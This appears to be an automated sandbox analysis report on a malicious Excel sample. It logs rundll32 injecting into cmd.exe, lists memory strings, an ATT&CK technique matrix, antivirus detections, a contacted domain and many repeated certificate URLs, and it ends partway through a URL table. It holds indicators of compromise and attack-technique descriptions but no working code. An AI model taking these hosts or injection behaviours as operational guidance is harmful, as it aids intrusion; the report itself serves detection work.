Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D67A6
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D67C8
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D67D7
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D67FA
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D6940
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D694D
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D6954
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D696B
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D69A8
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D6A5D
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D6A64
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D6B68
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D6B6F
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D6BF5
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D6C02
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D6C09
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D6C1B
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D6C4E
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D6CAF
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D6CBD
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D6CDF
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D6CEE
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D6D07
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D6D77
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D6D87
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D6D8E
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D6D9F
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D6DB8
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D6DD7
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D6DDE
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D6EAB
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D6EB2
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D6ED8
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D6EFD
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D6F04
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D6FAC
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D6FB9
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D6FC0
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D6FD2
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D70A9
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D70B9
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D70DC
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D70E8
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D711A
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D71D8
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D71E8
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D71EF
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D7200
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D7219
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D7238
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D723F
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D730B
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D7312
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D7338
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D735D
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D7364
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D748E
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D749B
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D74A2
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D74B7
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D759F
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D75AF
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D75D2
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D75DE
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D7606
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D760B
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D761A
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D76BA
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D76C0
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D7771
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D7777
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D7807
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D7816
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D7873
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D78D0
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D78DF
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D78F1
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D7905
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D79B7
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D79C6
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D79E1
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D79E8
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D7A07
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D7A85
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D7AA3
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D7AB1
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D7AB8
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D7C5A
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D7C68
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe
Source: cmd.exe, 00000007.00000002.976381117.00000000051E0000.00000002.00000001.sdmpBinary or memory string: ShellFileViewFolderExploreFolderConfirmCabinetIDDeleteGroupDeleteItemReplaceItemReloadFindFolderOpenFindFileCreateGroupShowGroupAddItemExitProgman[RN
Source: cmd.exe, 00000007.00000002.976381117.00000000051E0000.00000002.00000001.sdmpBinary or memory string: %c:\%sExplorerDMGFrameGroupssetupPmFrameGetIconGetDescriptionGetWorkingDirSoftware\Microsoft\Windows\CurrentVersion\Explorer\MapGroupsSenderCA_DDECLASSInstallMake Program Manager GroupStartUpccInsDDEBWWFrameDDEClientWndClassBACKSCAPEMediaRecorderMedia Recorder#32770DDEClientddeClassgroups
Source: rundll32.exe, 00000001.00000003.711977375.0000000003036000.00000004.00000001.sdmp, cmd.exe, 00000007.00000002.972852929.00000000033C0000.00000002.00000001.sdmpBinary or memory string: Program Manager
Source: cmd.exe, 00000007.00000002.972852929.00000000033C0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
Source: cmd.exe, 00000007.00000002.972852929.00000000033C0000.00000002.00000001.sdmpBinary or memory string: Progman
Source: cmd.exe, 00000007.00000002.976381117.00000000051E0000.00000002.00000001.sdmpBinary or memory string: PreviewMetadataLabelPreviewMetadataSpacerPreviewEditMetadataPreviewMetadataControlIconLayoutsWorkAreaChangeActivityPreviewMetadataRowAddRemoveAppBarShell_TrayWndhomepagetasklinktasklinkTaskSearchTexttasks%s
Source: rundll32.exe, 00000001.00000003.711977375.0000000003036000.00000004.00000001.sdmpBinary or memory string: *Program ManagerpszDesktopTitleWSoftware\Classes\
Source: cmd.exe, 00000007.00000002.976381117.00000000051E0000.00000002.00000001.sdmpBinary or memory string: animationTileContentsSrcVerticalScrollBaranimationProgressSrcanimationTileContentsDstInneranimationTileContentsSrcInneranimationTileContentsDstanimationProgressDstInneranimationProgressDstanimationProgressSrcInnereltRegularTileHeadereltSummaryeltInterruptPaneeltProgressBaridOperationTileeltInterruptDoForAlleltItemIconeltInterruptDescriptioneltInterruptButtonsContainereltInterruptDeleteBtneltInterruptElevateBtneltItemPropseltItemNameeltInterruptYesBtneltInterruptRetryBtneltInterruptCancelBtneltInterruptSkipBtnConfirmationCheckBoxDoForAlleltInterruptNoBtneltInterruptOKBtnshell\shell32\operationstatusmgr.cppidTileSubTextidOperationInterrupteltInterruptDoForAllLabelidTileActionIdTileKeepSourceidItemTileIdTileDecideForEachIdTileIgnoreIdTileKeepAsPersonalIdTileKeepAsWorkIdTileKeepDestCustomCommandIconDecideForEachTileIconSkipTileIconKeepSourceTileIconeltItemTileContainereltConflictInterruptDescriptionidTileIconidCustomConflictInterrupteltInterruptTileHeaderidConflictInterrupteltRateChartCHARTVIEW%0.2fIdTileDefaulteltPauseButtoneltTileContentseltTile%ueltTimeRemainingeltConflictInterrupteltConfirmationInterrupteltLocationseltItemsRemainingeltDetailseltScrolleltRegularTileeltCancelButtonidTileHosteltScrollBarFillereltDividereltProgressBarContainereltDisplayModeBtnFocusHoldereltDisplayModeBtnWindows.SystemToast.ExplorerEnthusiastModeprogmaneltFooterArealfEscapementSoftware\Microsoft\NotepadRICHEDIT50WlfUnderlinelfItaliclfWeightlfOrientationlfClipPrecisionlfOutPrecisionlfCharSetlfStrikeOutLucida ConsoleiPointSizelfPitchAndFamilylfQualitylfFaceName
Source: cmd.exe, 00000007.00000002.976381117.00000000051E0000.00000002.00000001.sdmpBinary or memory string: ImageList_CoCreateInstanceProgmanProgram Managercomctl32.dllImageList_ReplaceIconImageList_CreateImageList_Destroy
Source: cmd.exe, 00000007.00000002.976381117.00000000051E0000.00000002.00000001.sdmpBinary or memory string: |}TFoldersAppPropertiesShell*ProgmanProgmanPROGMANSoftware\Microsoft\Windows\CurrentVersion\PoliciesPolicyAutoColorizationHandleAssociationChange
Source: cmd.exe, 00000007.00000002.972852929.00000000033C0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
Source: rundll32.exe, 00000001.00000003.711977375.0000000003036000.00000004.00000001.sdmpBinary or memory string: RtlDllShutdownInProgress_p0.*System*.*....../UseSystemForSystemFoldersSoftware\Microsoft\Windows\CurrentVersion\Explorerdesktop.ini%APPDATA%%USERPROFILE%%ALLUSERSPROFILE%%ProgramFiles%%SystemRoot%%SystemDrive%\\%COMPUTERNAME%...\...PATH.exe.lnk.cmd.bat.com.pifCutListSoftware\Microsoft\Windows\CurrentVersion\Explorer\FileAssociation\VarFileInfo\Translation\StringFileInfo\%04X%04X\FileDescription\StringFileInfo\040904E4\FileDescription\StringFileInfo\04090000\FileDescriptionProgram ManagerpszDesktopTitleW%%%s%%%sUSERPROFILEProgramFilesSystemRootSystemDrivewindir"%1"commandshellSoftware\classesDefaultIconshell\%sAssignmentType0Software\Classes\Applications\%sSoftware\Classes\Applications%1.ade.adp.app.asp.cer.chm.cnt.crt.csh.der.fxp.gadget.grp.hlp.hpj.inf.ins.isp.its.js.jse.ksh.mad.maf.mag.mam.maq.mar.mas.mat.mau.mav.maw.mcf.mda.mdb.mde.mdt.mdw.mdz.msc.msh.msh1.msh1xml.msh2.msh2xml.mshxml.msp.mst.msu.ops.pcd.pl.plg.prf.prg.printerexport.ps1.ps1xml.ps2.ps2xml.psc1.psc2.psd1.psm1.pst.scf.sct.shb.shs.theme.tmp.url.vbe.vbp.vbs.vhd.vhdx.vsmacros.vsw.webpnp.ws.wsc.wsf.wsh.xnkHKCU:HKLM:HKCR:%s\shell\%s\commandshell\%s\commandSoftware\Clients\%sSoftware\Clients\%s\%sOpen*.*....../UseSystemForSystemFoldersdesktop.ini%SystemDrive%\\%COMPUTERNAME%...\...%s\%s\StringFileInfo\04090000\FileDescriptionT
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_6732AB0A cpuid
Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,
Source: C:\Windows\SysWOW64\rundll32.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,
Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,
Source: C:\Windows\SysWOW64\rundll32.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_6732AD36 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting21Path InterceptionProcess Injection512Masquerading121OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryQuery Registry1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsExploitation for Client Execution43Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion21Security Account ManagerSecurity Software Discovery21SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection512NTDSProcess Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsVirtualization/Sandbox Evasion21SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonScripting21Cached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information2DCSyncFile and Directory Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobRundll321Proc FilesystemSystem Information Discovery23Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Documents_111651917_375818984.xls3%VirustotalBrowse

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\vegas[1].dll4%ReversingLabs
C:\Users\user\bsdnbsej.dbw4%ReversingLabs

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
7.2.cmd.exe.10b0000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl00%URL Reputationsafe
http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl00%URL Reputationsafe
http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl00%URL Reputationsafe
http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl00%URL Reputationsafe
http://www.certplus.com/CRL/class3.crl00%URL Reputationsafe
http://www.certplus.com/CRL/class3.crl00%URL Reputationsafe
http://www.certplus.com/CRL/class3.crl00%URL Reputationsafe
http://www.certplus.com/CRL/class3.crl00%URL Reputationsafe
http://www.e-me.lv/repository00%URL Reputationsafe
http://www.e-me.lv/repository00%URL Reputationsafe
http://www.e-me.lv/repository00%URL Reputationsafe
http://www.e-me.lv/repository00%URL Reputationsafe
http://www.acabogacia.org/doc00%URL Reputationsafe
http://www.acabogacia.org/doc00%URL Reputationsafe
http://www.acabogacia.org/doc00%URL Reputationsafe
http://www.acabogacia.org/doc00%URL Reputationsafe
http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
http://ocsp.suscerte.gob.ve00%URL Reputationsafe
http://ocsp.suscerte.gob.ve00%URL Reputationsafe
http://ocsp.suscerte.gob.ve00%URL Reputationsafe
http://ocsp.suscerte.gob.ve00%URL Reputationsafe
http://www.postsignum.cz/crl/psrootqca2.crl020%URL Reputationsafe
http://www.postsignum.cz/crl/psrootqca2.crl020%URL Reputationsafe
http://www.postsignum.cz/crl/psrootqca2.crl020%URL Reputationsafe
http://www.postsignum.cz/crl/psrootqca2.crl020%URL Reputationsafe
http://crl.dhimyotis.com/certignarootca.crl00%URL Reputationsafe
http://crl.dhimyotis.com/certignarootca.crl00%URL Reputationsafe
http://crl.dhimyotis.com/certignarootca.crl00%URL Reputationsafe
http://crl.dhimyotis.com/certignarootca.crl00%URL Reputationsafe
https://18.222.240.99/qOh0%Avira URL Cloudsafe
http://www.chambersign.org10%URL Reputationsafe
http://www.chambersign.org10%URL Reputationsafe
http://www.chambersign.org10%URL Reputationsafe
http://www.chambersign.org10%URL Reputationsafe
http://www.pkioverheid.nl/policies/root-policy00%URL Reputationsafe
http://www.pkioverheid.nl/policies/root-policy00%URL Reputationsafe
http://www.pkioverheid.nl/policies/root-policy00%URL Reputationsafe
http://www.pkioverheid.nl/policies/root-policy00%URL Reputationsafe
http://www.suscerte.gob.ve/lcr0#0%URL Reputationsafe
http://www.suscerte.gob.ve/lcr0#0%URL Reputationsafe
http://www.suscerte.gob.ve/lcr0#0%URL Reputationsafe
http://www.suscerte.gob.ve/lcr0#0%URL Reputationsafe
http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz00%URL Reputationsafe
http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz00%URL Reputationsafe
http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz00%URL Reputationsafe
http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz00%URL Reputationsafe
http://crl.ssc.lt/root-c/cacrl.crl00%URL Reputationsafe
http://crl.ssc.lt/root-c/cacrl.crl00%URL Reputationsafe
http://crl.ssc.lt/root-c/cacrl.crl00%URL Reputationsafe
http://crl.ssc.lt/root-c/cacrl.crl00%URL Reputationsafe
http://postsignum.ttc.cz/crl/psrootqca2.crl00%URL Reputationsafe
http://postsignum.ttc.cz/crl/psrootqca2.crl00%URL Reputationsafe
http://postsignum.ttc.cz/crl/psrootqca2.crl00%URL Reputationsafe
http://postsignum.ttc.cz/crl/psrootqca2.crl00%URL Reputationsafe
http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl0%URL Reputationsafe
http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl0%URL Reputationsafe
http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl0%URL Reputationsafe
http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl0%URL Reputationsafe
http://ca.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
http://ca.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
http://ca.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
http://ca.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
http://crl1.comsign.co.il/crl/comsignglobalrootca.crl00%URL Reputationsafe
http://crl1.comsign.co.il/crl/comsignglobalrootca.crl00%URL Reputationsafe
http://crl1.comsign.co.il/crl/comsignglobalrootca.crl00%URL Reputationsafe
http://crl1.comsign.co.il/crl/comsignglobalrootca.crl00%URL Reputationsafe
http://www.certplus.com/CRL/class3P.crl00%URL Reputationsafe
http://www.certplus.com/CRL/class3P.crl00%URL Reputationsafe
http://www.certplus.com/CRL/class3P.crl00%URL Reputationsafe
http://www.certplus.com/CRL/class3P.crl00%URL Reputationsafe
http://www.suscerte.gob.ve/dpc00%URL Reputationsafe
http://www.suscerte.gob.ve/dpc00%URL Reputationsafe
http://www.suscerte.gob.ve/dpc00%URL Reputationsafe
http://www.suscerte.gob.ve/dpc00%URL Reputationsafe
http://www.certplus.com/CRL/class2.crl00%URL Reputationsafe
http://www.certplus.com/CRL/class2.crl00%URL Reputationsafe
http://www.certplus.com/CRL/class2.crl00%URL Reputationsafe
http://www.certplus.com/CRL/class2.crl00%URL Reputationsafe
http://www.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
http://www.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
http://www.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
http://www.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
http://www.defence.gov.au/pki00%URL Reputationsafe
http://www.defence.gov.au/pki00%URL Reputationsafe
http://www.defence.gov.au/pki00%URL Reputationsafe
http://www.defence.gov.au/pki00%URL Reputationsafe
http://www.sk.ee/cps/00%URL Reputationsafe
http://www.sk.ee/cps/00%URL Reputationsafe
http://www.sk.ee/cps/00%URL Reputationsafe
http://www.sk.ee/cps/00%URL Reputationsafe
http://www.globaltrust.info0=0%Avira URL Cloudsafe
http://policy.camerfirma.com00%URL Reputationsafe
http://policy.camerfirma.com00%URL Reputationsafe
http://policy.camerfirma.com00%URL Reputationsafe
http://policy.camerfirma.com00%URL Reputationsafe
http://www.ssc.lt/cps030%URL Reputationsafe
http://www.ssc.lt/cps030%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
otusmail.com
104.21.64.132
truefalse
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    		unknown
    http://www.certplus.com/CRL/class3.crl0cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    		unknown
    http://www.e-me.lv/repository0cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    		unknown
    http://www.acabogacia.org/doc0cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    		unknown
    http://crl.chambersign.org/chambersroot.crl0cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    		unknown
    http://ocsp.suscerte.gob.ve0cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    		unknown
    http://www.postsignum.cz/crl/psrootqca2.crl02cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    		unknown
    http://crl.dhimyotis.com/certignarootca.crl0cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
    • URL Reputation: safe
